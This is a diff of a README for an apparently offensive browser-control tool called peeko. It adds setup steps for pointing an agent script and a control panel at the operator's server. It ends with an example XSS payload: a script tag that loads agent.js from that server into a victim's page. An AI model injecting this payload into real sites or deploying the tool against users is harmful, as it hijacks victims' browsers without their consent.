b3rito/peeko/README.md

     make cert
     ```

+5. Replace the `SERVER-IP` placeholder:

+    Open the following files and replace all occurrences of `SERVER-IP` with the actual IP address or domain of your machine:

+    - `static/agent.js`
+    - `static/control.html`

+    Example:

+    ```javascript
+    wss://SERVER-IP:8443/ws → wss://192.168.1.12:8443/ws
+    ```

-5. Run the server:
+6. Run the server:

     ```bash
     make run
     ```

-6. Open your browser and access the control panel:
+7. Open your browser and access the control panel:

     ```
     https://SERVER-IP:8443/static/control.html
     ```

-7. Inject the XSS payload (example):
+8. Inject the XSS payload (example):

     ```html
     <script src="https://SERVER-IP:8443/static/agent.js"></script>
     ```
 ---

 ## Usage